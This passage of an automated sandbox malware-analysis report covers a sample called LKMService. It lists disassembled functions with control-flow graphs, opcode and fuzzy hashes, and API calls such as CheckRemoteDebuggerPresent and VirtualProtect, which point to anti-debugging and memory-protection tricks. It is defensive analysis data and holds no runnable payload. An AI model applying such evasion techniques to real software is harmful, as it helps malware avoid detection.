                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3dc9d0385d737dee413e55fbf1520d98192a435af4c69582a07a69135d363ccd
                                                                                                                                                                                                                                            • Instruction ID: 551216b2c671f7f18481bb5f6a58a7cb990aa7d29c788844db6a50923d3467b6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3dc9d0385d737dee413e55fbf1520d98192a435af4c69582a07a69135d363ccd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F841C035B002058FE768DA79852476FBAFBBBCA600F14882AD507DB398DE74CD068751
                                                                                                                                                                                                                                            Function 058B2240 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 0b76be2ef12d2e69f3c8c1179bf1bd65a93a5a918861f54e91bebc369a627115
                                                                                                                                                                                                                                            • Instruction ID: b89b3be1136de6c8811988b3f27d1f0ff5d97e7bb50559a73359cb9c0a7b5721
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b76be2ef12d2e69f3c8c1179bf1bd65a93a5a918861f54e91bebc369a627115
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5641D175B002058BE758DA79852476FBAFBBFCA600F24842AD507DF398DE74CD028791
                                                                                                                                                                                                                                            Function 058BC334 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: d79c7f8b01252deb70bbc432a944382bd75d0ebe73601a07a879d0a72b6a04cb
                                                                                                                                                                                                                                            • Instruction ID: ea1584716276dcf796656b84cc65b400441fe033673d8153daf9211ebfaf0698
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d79c7f8b01252deb70bbc432a944382bd75d0ebe73601a07a879d0a72b6a04cb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62417171B0011ACFE714CF6AC6819ADFBF6BF89214B65866AD805EB316D770DE018F41
                                                                                                                                                                                                                                            Function 058BC36B Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9df5030085ee6b7e319988f16f01505fccb625f1b64c742dbe8601b95875a63b
                                                                                                                                                                                                                                            • Instruction ID: 2e530a4764a8cfe3d188224ffad0909b94591b8810b5bd7120bb4fff9679ce08
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9df5030085ee6b7e319988f16f01505fccb625f1b64c742dbe8601b95875a63b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42419271B0011BCFE714CF69C6819ADFBB6BB89214B65866AD806EB316CB70DE018F41
                                                                                                                                                                                                                                            Function 017F134F Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 33 17f134f-17f1352 34 17f1355-17f135a 33->34 35 17f1354 33->35 36 17f135d-17f135e 34->36 37 17f135c 34->37 35->34 38 17f1361-17f1362 36->38 39 17f1360 36->39 37->36 40 17f1365-17f1366 38->40 41 17f1364 38->41 39->38 42 17f1369-17f136a 40->42 43 17f1368 40->43 41->40 45 17f136d-17f1371 42->45 46 17f136c 42->46 43->42 44 17f1373-17f1376 43->44 47 17f1379-17f137a 44->47 48 17f1378 44->48 45->44 46->45 49 17f137d-17f137e 47->49 50 17f137c 47->50 48->47 51 17f1381-17f141c CheckRemoteDebuggerPresent 49->51 52 17f1380 49->52 50->49 56 17f141e-17f1424 51->56 57 17f1425-17f1460 51->57 52->51 56->57
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4576314706.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_17f0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a7d92f9a348277fdf99e8db76695bb42e661483c7b9332d43f06e6cd3280ee78
                                                                                                                                                                                                                                            • Instruction ID: 199905d4c814794ce8f07871e70414cf8315fe6c62b5012d6f5850056529cfee
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7d92f9a348277fdf99e8db76695bb42e661483c7b9332d43f06e6cd3280ee78
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6041BA72804A86DFDB10CF69C850AEAFBF1FF9A320F58829ED554A7641C334A540CBA1
                                                                                                                                                                                                                                            Function 017F6BD0 Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 60 17f6bd0-17f6be3 61 17f6beb-17f6c88 VirtualProtect 60->61 62 17f6be5-17f6bea 60->62 66 17f6c8a-17f6c90 61->66 67 17f6c91-17f6cb2 61->67 66->67
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 017F6C7B
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4576314706.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_17f0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                                                                                                                            • Opcode ID: e3dddd883df53a5e2505772b23c3631bf4498bdaa4ce18756174471d5d6a96f9
                                                                                                                                                                                                                                            • Instruction ID: efbc06c11cbe5d46b7b3aaacb38564cf8377bee6bf55184b9fb6925dedd19bc7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3dddd883df53a5e2505772b23c3631bf4498bdaa4ce18756174471d5d6a96f9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F2146B28007499FDB10CFAAC984B9EFBF4EB49310F208469E558A7251D379A945CFA1
                                                                                                                                                                                                                                            Function 017F1470 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 75 17f1470-17f14f8 VirtualProtect 78 17f14fa-17f1500 75->78 79 17f1501-17f1522 75->79 78->79
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 017F14EB
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4576314706.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_17f0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                                                                                                                            • Opcode ID: 8bd0af68ccb9925ac9a20e483e5fc6a089b7f07f2c102e3c9fee8aa6fcdc17cf
                                                                                                                                                                                                                                            • Instruction ID: 1ffe501cfd5e9fd82a93ff3e21c884920bec528f7427488b7b9ab6885e16093c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8bd0af68ccb9925ac9a20e483e5fc6a089b7f07f2c102e3c9fee8aa6fcdc17cf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E621F4B5900249DFDB10CF9AD584BDEFBF4FB48310F108429E558A7250D378A544CFA5
                                                                                                                                                                                                                                            Function 017F1478 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 81 17f1478-17f14f8 VirtualProtect 83 17f14fa-17f1500 81->83 84 17f1501-17f1522 81->84 83->84
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 017F14EB
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4576314706.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_17f0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                                                                                                                            • Opcode ID: 2c0342185ce534ffae64bec70dce8130dd9a24f14150048fc377590a0555bb4f
                                                                                                                                                                                                                                            • Instruction ID: 183b133d3bcf054ba352b8873c61a93f35ce4be8f0ddf1f49c8f70369d8e66e2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c0342185ce534ffae64bec70dce8130dd9a24f14150048fc377590a0555bb4f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6421D3B5900649DFDB10CF9AD584BDEFBF4EB48320F108429E958A7250D378A644CFA5
                                                                                                                                                                                                                                            Function 017F6C08 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 86 17f6c08-17f6c88 VirtualProtect 88 17f6c8a-17f6c90 86->88 89 17f6c91-17f6cb2 86->89 88->89
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 017F6C7B
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4576314706.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_17f0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                                                                                                                            • Opcode ID: 3087327f6fca90159fc435958d4df1cb2262d221b72bfecda88145ff6246db14
                                                                                                                                                                                                                                            • Instruction ID: a93e1c19999e4afc917fe8963f206ce4f6aaaa05ffde6e35fad4858331f05f4c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3087327f6fca90159fc435958d4df1cb2262d221b72bfecda88145ff6246db14
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 982103B1D006499FDB10CF9AC584BDEFBF4EB48320F108029E958A7250D378A544CFA5
                                                                                                                                                                                                                                            Function 058B4F30 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 364 58b4f30-58b4f67 366 58b4f8a-58b4f95 364->366 367 58b4f69 364->367 368 58b4f6e-58b4f7d 366->368 367->368 369 58b50dc 368->369 370 58b4f83 368->370 372 58b50e3 369->372 370->366 370->367 370->369 371 58b511d-58b5124 370->371 370->372 373 58b4f97-58b4fc5 370->373 374 58b4fc7-58b4fe2 370->374 375 58b5106-58b5108 370->375 376 58b4fe4-58b5061 call 58b2448 call 58b3570 370->376 377 58b5094-58b50a4 370->377 380 58b50e8-58b50fd 372->380 373->368 374->368 384 58b5110-58b511b 375->384 397 58b5069-58b5079 376->397 378 58b50ab-58b50b0 377->378 379 58b50a6 377->379 378->368 379->378 380->371 382 58b50ff 380->382 382->371 382->372 382->375 384->380 398 58b507b-58b5080 397->398 399 58b5082 397->399 400 58b5087-58b508f 398->400 399->400 400->368
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: #Hzq^
                                                                                                                                                                                                                                            • API String ID: 0-1961569154
                                                                                                                                                                                                                                            • Opcode ID: 73ddd5b3838e32141b4be5c5438af639c6c60391dc406df99f9265b1089bbeff
                                                                                                                                                                                                                                            • Instruction ID: 13327bb8910634b3df0dc22f261a63a44e0ad8781ca366fb9a2d71dd219665fc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 73ddd5b3838e32141b4be5c5438af639c6c60391dc406df99f9265b1089bbeff
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB51F231A05205DBEB14CF68D95169EBBF7FF85240B20892AE446CB3A5EA70ED06CB41
                                                                                                                                                                                                                                            Function 058B4F40 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 433 58b4f40-58b4f67 434 58b4f8a-58b4f95 433->434 435 58b4f69 433->435 436 58b4f6e-58b4f7d 434->436 435->436 437 58b50dc 436->437 438 58b4f83 436->438 440 58b50e3 437->440 438->434 438->435 438->437 439 58b511d-58b5124 438->439 438->440 441 58b4f97-58b4fc5 438->441 442 58b4fc7-58b4fe2 438->442 443 58b5106-58b5108 438->443 444 58b4fe4-58b5061 call 58b2448 call 58b3570 438->444 445 58b5094-58b50a4 438->445 448 58b50e8-58b50fd 440->448 441->436 442->436 452 58b5110-58b511b 443->452 465 58b5069-58b5079 444->465 446 58b50ab-58b50b0 445->446 447 58b50a6 445->447 446->436 447->446 448->439 450 58b50ff 448->450 450->439 450->440 450->443 452->448 466 58b507b-58b5080 465->466 467 58b5082 465->467 468 58b5087-58b508f 466->468 467->468 468->436
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: #Hzq^
                                                                                                                                                                                                                                            • API String ID: 0-1961569154
                                                                                                                                                                                                                                            • Opcode ID: 375d10fd42744a947a6a99fadcb1e0ac7f1ce58b883284222f281723047c76c2
                                                                                                                                                                                                                                            • Instruction ID: 73e1a7e5a33d23d23c21f2feed8ea748e7f91d7a034fc71b737b22fc282435b8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 375d10fd42744a947a6a99fadcb1e0ac7f1ce58b883284222f281723047c76c2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4141E231A05209DBEB14CF68D95069EBBF7FF85240B24892AE446DB3A5EA70ED05CB41
                                                                                                                                                                                                                                            Function 058B4981 Relevance: 1.3, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: #"ug
                                                                                                                                                                                                                                            • API String ID: 0-697578506
                                                                                                                                                                                                                                            • Opcode ID: 2069123727461c990104d2900454b45f693af603285446cb6e65adf5e162aa07
                                                                                                                                                                                                                                            • Instruction ID: 732c620afe89bbc14de5f8fabac83ebb29c5b8a167299ad253b37d68b2e4d2f0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2069123727461c990104d2900454b45f693af603285446cb6e65adf5e162aa07
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A013175B00115CFEB289B78C46866E76BBBB99300F144429D406DB7A9CE768C829B91
                                                                                                                                                                                                                                            Function 058B6887 Relevance: 1.3, Strings: 1, Instructions: 13COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: 1P?,
                                                                                                                                                                                                                                            • API String ID: 0-1869162679
                                                                                                                                                                                                                                            • Opcode ID: 6dc632f74b06c977215a81363b97ae00a5534db08a0d88366cafc83542155744
                                                                                                                                                                                                                                            • Instruction ID: fe0dd385f1042fef94adf9a276b488efb2514e1a4be54dc1d3ccb82bdeed85ab
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6dc632f74b06c977215a81363b97ae00a5534db08a0d88366cafc83542155744
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1AD0A732E19145CFD715CE29D385ACA7BF6BBAE10072A4092DC03EB365E270CE41CB00
                                                                                                                                                                                                                                            Function 058B1203 Relevance: 1.3, Strings: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ntin
                                                                                                                                                                                                                                            • API String ID: 0-3077571345
                                                                                                                                                                                                                                            • Opcode ID: 4422dbc7b8857fdb48fbba3ceed9338d86dc2703f5efd4ebbc3580848bf1abeb
                                                                                                                                                                                                                                            • Instruction ID: 971bedd3e7257ef1f7f114fbcb386b6b4b9d0737d60d3d5435a7cc55a07721e9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4422dbc7b8857fdb48fbba3ceed9338d86dc2703f5efd4ebbc3580848bf1abeb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75D05E7090421ECFDB04CF98C945B9FBFB8AF48204F264044C505BBB62DA30AD01DF61
                                                                                                                                                                                                                                            Function 058B1283 Relevance: 1.3, Strings: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ntin
                                                                                                                                                                                                                                            • API String ID: 0-3077571345
                                                                                                                                                                                                                                            • Opcode ID: 8f4341236f120caca7691841defdcd01c2837a2fa86b7d8d1264c23faa87c064
                                                                                                                                                                                                                                            • Instruction ID: 54ff4a82707079757f6ec57651465f0d1fd2a8ac9d28f25a46bbd58a7ab811b5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f4341236f120caca7691841defdcd01c2837a2fa86b7d8d1264c23faa87c064
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47D02334C0C314CB7311CF00C6094DAFF986608500F3154448847EFB22F272AD005F10
                                                                                                                                                                                                                                            Function 058BB1D4 Relevance: .5, Instructions: 540COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: ad745dc7f29301c912f025532f3c67ebcd2d97e05ab47ec1fb0af23279dd5aed
                                                                                                                                                                                                                                            • Instruction ID: f3f8dcbc169ae8bdf8470b66b5594e92a2fd36439adbc2865671f0fe29974db5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ad745dc7f29301c912f025532f3c67ebcd2d97e05ab47ec1fb0af23279dd5aed
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B5191306002059FEB15DF68C854BEE7BA6FF89321F14856DE9469B3A5CB76EC42CB40
                                                                                                                                                                                                                                            Function 058BB510 Relevance: .2, Instructions: 194COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: c31c3598d69ad60572e6e040b3977974fb35c380cb5a2138e6a35a79d8e2a689
                                                                                                                                                                                                                                            • Instruction ID: 5941052f54afaa6567dc2ce6359bd47626cab736b0b83bfcf4060a17207f0a6a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c31c3598d69ad60572e6e040b3977974fb35c380cb5a2138e6a35a79d8e2a689
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD6181313002059FEB1A9F64D854BAE7BA6FFC5321F14846DE9069B3A5CB75EC02CB91
                                                                                                                                                                                                                                            Function 058B6038 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a46959aadfc13864510aa18b425d11f96fc41889dfafc34b1cb434d33c929f06
                                                                                                                                                                                                                                            • Instruction ID: 907e399c212937e82410ac50b3bdf50fd7291c1b183806adaa3ef9d2d1362857
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a46959aadfc13864510aa18b425d11f96fc41889dfafc34b1cb434d33c929f06
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6510671E002589BEF14DFAAD944BDEBBB5BF88704F148029D815E7344EBB49946CF50
                                                                                                                                                                                                                                            Function 058B602C Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a8124fc11917d94da2b7bcfef7293f6fe662015225eecc17fc83087bfec625f8
                                                                                                                                                                                                                                            • Instruction ID: e6a83a638f495fa45d597322005342424cee0660fba198193eb1df25d54ea4de
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a8124fc11917d94da2b7bcfef7293f6fe662015225eecc17fc83087bfec625f8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38512770D002599BEB14DFAAC944BDEBBF5BF48700F148029E815E7344EBB49846CF91
                                                                                                                                                                                                                                            Function 058B8678 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3ba4fb18761020061c66997ed4735d7ac745d69bfcaf371ecd18c6d6e7da359f
                                                                                                                                                                                                                                            • Instruction ID: 2b3394fb9b5720728f0fd35a48282244a760f3b13cff74800515002a4ab1d6cf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ba4fb18761020061c66997ed4735d7ac745d69bfcaf371ecd18c6d6e7da359f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B641E135E10159DFDB04CB68D895AEEBBFEAB89305F10846AE802EB350CAB4DC018F54
                                                                                                                                                                                                                                            Function 058B6228 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
